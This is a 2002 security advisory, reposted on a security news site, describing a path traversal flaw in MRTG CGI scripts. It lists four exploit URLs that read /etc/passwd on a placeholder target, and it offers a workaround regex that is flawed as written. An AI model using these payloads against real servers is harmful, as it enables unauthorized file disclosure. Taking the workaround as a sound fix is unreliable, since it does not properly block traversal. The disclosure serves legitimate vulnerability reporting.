Risks
Vulnerabilities
Browse by
MRTG CGI script "show files" Vulnerability
04 February 2002
Bookmark and Share
---=== UkR Security Team advisory ===---

Name : MRTG CGI script "show files" Vulnerability
About : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links. MRTG generates HTML pages containing GIF images which provide a LIVE visual representation of this traffic
Product vendor: MRTG / http://www.mrtg.org
Problem : Problem lyes in incorrect validation of user submitted
-by-browser information, that can show first string of any file of the system where script installed.
Workaround : this will help in somewhat : $input =~
s/[(\.\.)|\/]//g;
Author : UkR-XblP / UkR security team
Exploit :
http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd




Spotlight

Free security software identifies cloud vulnerabilities

Posted on 21 October 2104.  |  Designed for IT and security professionals, the service gives a view of the data exchanged with partner and cloud applications beyond the network firewall. Completely passive, it runs on non-production systems, and does not require firewall changes.


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  

DON'T
MISS

Tue, Oct 21st
    COPYRIGHT 1998-2014 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //